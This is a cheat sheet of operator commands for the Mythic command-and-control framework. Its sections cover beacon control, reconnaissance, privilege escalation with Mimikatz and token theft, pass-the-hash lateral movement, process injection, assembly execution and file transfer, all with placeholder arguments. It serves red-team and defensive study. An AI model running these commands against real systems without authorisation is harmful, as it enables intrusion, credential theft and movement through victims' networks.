# Mythic ## **Beacon Management (Real-Time C2 Control)** ```bash # Set agent to real-time communication (no sleep) Mythic > sleep 0 0 # Instruct agent to exit Mythic > exit # List all running jobs Mythic > jobs # Kill a specific job Mythic > jobkill [jid] # Load additional commands into agent Mythic > load command1 command2 ... # Link to a peer-to-peer (SMB/TCP) agent Mythic > link # Unlink a linked agent Mythic > unlink ``` *** ## **Information Gathering / Recon** ```bash # List network interfaces and IP addresses Mythic > ifconfig # List running processes Mythic > ps # List directory contents Mythic > ls -Path [path] # Print current working directory Mythic > pwd # Display domain controllers Mythic > net_dclist [domain.local] # List shares on a remote machine Mythic > net_shares -Computer [hostname] # Show local groups on a machine Mythic > net_localgroup [hostname] # Show members of a local group Mythic > net_localgroup_member -Group [groupname] -Computer [hostname] # View network connections Mythic > netstat -Tcp -Udp # Take a screenshot Mythic > screenshot ``` *** ## **Privilege Escalation** ```bash # Attempt to enable all possible privileges Mythic > getprivs # Use Mimikatz directly Mythic > mimikatz -Command "privilege::debug" # Steal token from a PID Mythic > steal_token [pid] # Impersonate a user with credentials Mythic > make_token -username [user] -password [pass] # PrintSpoofer to escalate to SYSTEM Mythic > printspoofer -Command "cmd.exe" # Revert to original token Mythic > rev2self ``` *** ## **Lateral Movement** ```bash # Use Pass-the-Hash to run commands Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe] # Copy file to remote system Mythic > cp -Path [source] -Destination [dest] # List services or manipulate them Mythic > sc -Query -Computer [host] # Use PowerShell remoting (if applicable) Mythic > powershell -Command "Invoke-Command ..." ``` *** ## **Post-Exploitation / Execution** ```bash # Run shell command Mythic > shell whoami # Run PowerShell in current process Mythic > powershell -Command "Get-Process" # Import PowerShell script Mythic > powershell_import # Inject PowerShell into a specific process Mythic > psinject -PID [pid] -Command "..." # Execute .NET assembly Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical" # Register .NET assembly Mythic > register_assembly # Execute inline .NET assembly Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..." # Execute unmanaged PE Mythic > execute_pe -PE [binary.exe] -Arguments "..." # Execute Beacon Object File (BOF) Mythic > execute_coff -Coff [file.o] -Function [go] ``` *** ## **File Transfer** ```bash # Upload a file Mythic > upload # Download a file Mythic > download -Path [path] # Remove a file Mythic > rm -Path [path] ```